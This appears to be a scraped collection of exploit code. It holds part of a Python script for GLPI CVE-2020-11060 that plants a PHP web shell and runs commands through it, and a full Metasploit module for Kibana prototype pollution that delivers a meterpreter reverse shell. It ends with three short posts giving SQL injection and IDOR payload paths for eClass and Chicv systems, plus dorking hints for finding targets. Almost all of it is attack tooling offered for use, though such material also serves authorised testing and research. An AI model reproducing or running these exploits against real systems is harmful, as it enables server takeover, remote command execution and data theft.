_description_ datemod (str): _description_ """ print("[+] Modifying network") for rawlink in set( link for link in html.fromstring( self.__session.get(f"{self.__url}/front/wifinetwork.php").content ).xpath("//a/@href") if "wifinetwork.form.php?id=" in link ): # edit the network name and essid self.__session.post( f"{self.__url}/front/wifinetwork.form.php", data={ "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": PAYLOAD, "essid": f"RCE{padding}", "mode": "ad-hoc", "update": "Save", "id": rawlink.split("=")[-1], "_glpi_csrf_token": self.__extract_csrf( self.__session.get( f"{self.__url}/front/{rawlink.split('/')[-1]}" ).text ), "_read_date_mod": datemod, }, ) print(f"\tNew ESSID: RCE{padding}") def create_dump(self, wifi_table_offset: str = None): """ Initiates a dump request to the server. Args: wifi_table_offset (str, optional): The offset for the 'wifi_networks' table. Defaults to '310'. Note: Adjust the offset number to match the table number for wifi_networks. This can be found by downloading a SQL dump and running: zgrep -n "CREATE TABLE" glpi-backup-*.sql.gz | grep -n wifinetworks """ dump_target = f"{self.path}{self.__shell_name}" print(f"[*] Dumping the database remotely at: {dump_target}") self.__session.get( f"{self.__url}/front/backup.php?dump=dump&offsettable={wifi_table_offset or '310'}&fichier={dump_target}" ) print(f"[+] File 'dumped', accessible at: {self.shell_path}") def upload_rce(self, wifi_table_offset: str = None) -> str: """ Uploads the RCE (Remote Code Execution) shell to the target. Args: wifi_table_offset (str, optional): The offset for the 'wifi_networks' table. Returns: str: A status message indicating the outcome of the upload. """ if not self.login(): print("[-] Login error") return print(f"[+] User {self.__user!r} is logged in.") # create timestamp datemod = datetime.now().strftime("%Y-%m-%d %H:%M:%S") tick = 1 while True: print("-" * 25 + f" trial number {tick} " + "-" * 25) # create padding for ESSID padding = "e" * tick self.wipe_networks(padding, datemod) self.create_network(datemod) self.edit_network(padding, datemod) self.__shell_name = ( "".join(random.choice(string.ascii_letters) for _ in range(8)) + ".php" ) print(f"[+] Current shellname: {self.__shell_name}") self.create_dump(wifi_table_offset) if self.__shell_check(): break tick += 1 print("-" * 66) print(f"[+] RCE found after {tick} trials!") # Private methods def __extract_csrf(self, html: str): """Extract CSRF token from the provided HTML content.""" return re.search( pattern=r'name="_glpi_csrf_token" value="([a-f0-9]{32})"', string=html ).group(1) def __shell_check(self) -> bool: """Check if the uploaded shell is active and responding correctly.""" r = self.__session.get( url=self.shell_path, params={"0": "echo HERE"}, ) shell_size = len(r.content) print(f"[+] Shell size: {shell_size!s}") if shell_size < 50: print("[x] Too small, there is a problem with the choosen offset.") return False return b"HERE" in r.content # Properties @property def path(self): """With this property, every time you access self.path, it will dynamically generate and return the path string based on the current value of self.accessible_directory. This way, it will always be a "direct reference" to the value of self.accessible_directory.""" if "win" in self.__platform.lower(): return f"C:\\xampp\\htdocs\\{self.accessible_directory}\\" else: return f"/var/www/html/glpi/{self.accessible_directory}/" @property def shell_path(self) -> str: """Generate the complete path to the uploaded shell.""" return f"{self.__url}/{self.accessible_directory}/{self.__shell_name}" def execute( url: str, command: str, timeout: float = None, ) -> str: """ Executes a given command on a remote server through a web shell. This function assumes a web shell has been previously uploaded to the target server and sends a request to execute the provided command. It uses a unique delimiter ("HoH") to ensure that the command output can be parsed and returned without any additional data. Args: url (str): The URL where the web shell is located on the target server. command (str): The command to be executed on the target server. timeout (float, optional): Maximum time, in seconds, for the request to the server. Defaults to None, meaning no timeout. Returns: str: The output of the executed command. Returns None if the URL or command is not provided. """ if url is None or command is None: return command = f"echo HoH&&{command}&&echo HoH" response = requests.get( url=url, params={ "0": command, }, timeout=timeout, verify=False, ) # Use regex to find the content between "HoH" delimiters if match := re.search( pattern=r"HoH(.*?)HoH", string=response.text, flags=re.DOTALL ): return match.group(1).strip() def main() -> None: parser = argparse.ArgumentParser() parser.add_argument("--url", help="Target URL.", required=True) parser.add_argument("--user", help="Username.", default=None) parser.add_argument("--password", help="Password.", default=None) parser.add_argument("--platform", help="Target OS (windows/unix).", default=None) parser.add_argument( "--offset", help="Offset for table wifi_networks.", default=None ) parser.add_argument( "--dir", help="Accessible directory on the target.", default="sound", required=False, ) # "sound" as default directory parser.add_argument("--command", help="Command to execute via RCE.", default=None) options = parser.parse_args() if options.command: # We assume the given URL is the shell path if a command is provided. try: response = execute(url=options.url, command=options.command, timeout=5) except TimeoutError: print(f"[x] Timeout received form target. Maybe your command failed.") else: print(f"[*] Response received from {options.url!r}:") print(response) finally: return target = GlpiBrowser( options.url, user=options.user, password=options.password, platform=options.platform, ) if not target.is_alive(): return target.accessible_directory = options.dir target.upload_rce(wifi_table_offset=options.offset) print( f"[+] You can execute command remotely as: {execute(url=target.shell_path, command='whoami').strip()}@{execute(url=target.shell_path, command='hostname').strip()}" ) print("[+] Run this tool again with the desired command to inject:") print( f"\tpython3 CVE-2020-11060.py --url '{target.shell_path}' --command 'desired_command_here'" ) if __name__ == "__main__": main() </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # causes service to not respond until cleanup and reboot include Msf::Exploit::Remote::HttpClient # decided not to use autocheck since it doesn't work for both targets def initialize(info = {}) super( update_info( info, 'Name' => 'Kibana Upgrade Assistant Telemetry Collector Prototype Pollution', 'Description' => %q{ Kibana before version 7.6.3 suffers from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're able to execute arbitrary code. Code execution is possible through two different ways. Either by sending data directly to Elastic, or using Kibana to submit the same queries. Either method enters the polluted prototype for Kibana to read. Kibana will either need to be restarted, or collection happens (unknown time) for the payload to execute. Once it does, cleanup must delete the .kibana_1 index for Kibana to restart successfully. Once a callback does occur, cleanup will happen allowing Kibana to be successfully restarted on next attempt. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Alex Brasetvik (alexbrasetvik)' # original PoC, analysis ], 'References' => [ [ 'URL', 'https://hackerone.com/reports/852613'], ], 'Privileged' => false, 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp', 'WfsDelay' => 1800 # 30min }, 'Targets' => [ [ 'ELASTIC', {}], # target kibana through a direct elastic connection [ 'KIBANA', {}] # target kibana through the dev console to implant elastic data ], 'DisclosureDate' => '2020-04-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], # down until cleanup and reboot 'Reliability' => [], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(9200), # default to elastic port, kibana is 5601 OptString.new('USERNAME', [ false, 'Elastic User to login with', '']), OptString.new('PASSWORD', [ false, 'Elastic Password to login with', '']), OptString.new('TARGETURI', [ true, 'The URI of the Kibana/Elastic Application', '/']) ] ) end # https://stackoverflow.com/a/4899857 def time_rand(from = Time.local(2020, 6, 28), to = Time.now) Time.at(from + rand * (to.to_f - from.to_f)).strftime('%FT%T.000Z') # outputs 2020-04-17T20:47:40.800Z format end # This is how it should be done, but it will crash the session. Leaving here in case someone figures out how to not crash the session # it may also only crash when on docker, and may be fine elsewehre. Regardless, good code to not lose just in case. def kibana_cleanup res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'), 'method' => 'POST', 'headers' => { 'kbn-xsrf' => @xsrf }, 'ctype' => 'application/json', 'vars_get' => { 'path' => '.kibana_1', # URI for the elastic request 'method' => 'DELETE' # method for the elastic query } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200 end def elastic_cleanup request = { 'uri' => normalize_uri(target_uri.path, '.kibana*'), 'method' => 'DELETE' } request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? res = send_request_cgi(request) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200 end def execute_command case target.name when 'ELASTIC' request = { 'uri' => normalize_uri(target_uri.path, '.kibana_1', '_doc', 'upgrade-assistant-telemetry:upgrade-assistant-telemetry'), 'method' => 'PUT', 'ctype' => 'application/json', 'data' => telemetry_data.to_json } request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? res = send_request_cgi(request) when 'KIBANA' res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'), 'method' => 'POST', 'headers' => { 'kbn-xsrf' => @xsrf }, 'ctype' => 'application/json', 'vars_get' => { 'path' => '.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry', # URI for the elastic request 'method' => 'PUT' # method for the elastic query }, 'data' => telemetry_data.to_json ) end fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 201 end def telemetry_data { 'upgrade-assistant-telemetry' => { 'ui_open.overview' => 1, 'ui_open.cluster' => 1, 'ui_open.indices' => 1, 'constructor.prototype.sourceURL' => "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('#{payload.encoded}')" }, 'type' => 'upgrade-assistant-telemetry', 'updated_at' => time_rand } end def kibana_create_index # if the index already exists, this will fail which is fine, we just need it to exist. res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'), 'method' => 'POST', 'ctype' => 'application/json', 'headers' => { 'kbn-xsrf' => @xsrf }, 'vars_get' => { 'path' => '.kibana_1', # URI for the elastic request 'method' => 'PUT' # method for the elastic query } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? if res.code == 400 vprint_status('Index already exists') return end fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200 end def elastic_create_index request = { 'uri' => normalize_uri(target_uri.path, '.kibana_1'), 'method' => 'PUT' } request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? res = send_request_cgi(request) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? if res.code == 400 vprint_status('Index already exists') return end fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200 end def kibana_send_mapping res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'), 'method' => 'POST', 'ctype' => 'application/json', 'headers' => { 'kbn-xsrf' => @xsrf }, 'vars_get' => { 'path' => '.kibana_1/_mappings', # URI for the elastic request 'method' => 'PUT' # method for the elastic query }, 'data' => mapping_data.to_json ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200 end def elastic_send_mapping request = { 'uri' => normalize_uri(target_uri.path, '.kibana_1', '_mappings'), 'method' => 'PUT', 'ctype' => 'application/json', 'data' => mapping_data.to_json } request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? res = send_request_cgi(request) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200 end def mapping_data { 'properties' => { 'upgrade-assistant-telemetry' => { 'properties' => { 'constructor' => { 'properties' => { 'prototype' => { 'properties' => { 'sourceURL' => { 'type' => 'text', 'fields' => { 'keyword' => { 'type' => 'keyword', 'ignore_above' => 256 } } } } } } }, 'features' => { 'properties' => { 'deprecation_logging' => { 'properties' => { 'enabled' => { 'type' => 'boolean', 'null_value' => true } } } } }, 'ui_open' => { 'properties' => { 'cluster' => { 'type' => 'long', 'null_value' => 0 }, 'indices' => { 'type' => 'long', 'null_value' => 0 }, 'overview' => { 'type' => 'long', 'null_value' => 0 } } }, 'ui_reindex' => { 'properties' => { 'close' => { 'type' => 'long', 'null_value' => 0 }, 'open' => { 'type' => 'long', 'null_value' => 0 }, 'start' => { 'type' => 'long', 'null_value' => 0 }, 'stop' => { 'type' => 'long', 'null_value' => 0 } } } } } } } end def check if target == targets[0] # elastic return CheckCode::Unknown('Unable to determine Kibana version from Elastic database') end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'app', 'kibana'), 'method' => 'GET', 'keep_cookies' => true ) return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 # this pulls a big JSON blob that we need as it has the version unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") end version_json = CGI.unescapeHTML(Regexp.last_match(1)) begin json_body = JSON.parse(version_json) rescue JSON::ParserError return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") end return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil? @version = json_body['version'] if Rex::Version.new(@version) < Rex::Version.new('7.6.3') return CheckCode::Appears("Exploitable Version Detected: #{@version}") end CheckCode::Safe("Unexploitable Version Detected: #{@version}") end def exploit @clean = true fail_with(Failure::BadConfig, 'A password has been defined without a username') if datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank? case target.name when 'ELASTIC' print_warning('RPORT should most likely be set to 9200 when exploiting the ELASTIC target') if datastore['RPORT'] != 9200 print_status('Creating index') elastic_create_index print_status('Sending index map') elastic_send_mapping when 'KIBANA' print_warning('RPORT should most likely be set to 5601 when exploiting the KIBANA target') if datastore['RPORT'] != 5601 # xsrf for unlicensed kibana seems to just be kibana... at least for 7.6.2 # https://discuss.elastic.co/t/where-can-i-get-the-correct-kbn-xsrf-value-for-my-plugin-http-requests/158725/3 @xsrf = 'kibana' print_status('Creating index') kibana_create_index print_status('Sending index map') kibana_send_mapping end print_status('Sending telemetry data with payload') execute_command print_status("Waiting #{datastore['WfsDelay']} seconds for shell (kibana restart/cleanup)") end def cleanup return unless @clean if target.name == 'KIBANA' print_error('Cleanup must happen on the Elastic Database for Kibana to start. You need to DELETE /.kibana_1') # kibana_cleanup return end print_status('Removing telemetry data to prevent Kibana locking on restart') elastic_cleanup end end </code></pre>

<pre><code>==================================================================================================================================== | # Title : eClass Junior 4.0 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://www.eclass.com.hk/en/product/eclass-junior/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /gallery_detail.php?cid=55 <===== inject here [+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55 [+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.php Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : eClass IP 2.5 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://www.eclass.com.hk/en/product/eclass-ip/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /gallery_detail.php?cid=55&id=161 <===== inject here [+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55&id=161 [+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.php Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Chicv Management System Login v4.5.6 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://chicv.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /admin/#/home [+] https://127.0.0.wwwjustfashionnowcom/admin/#/home Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>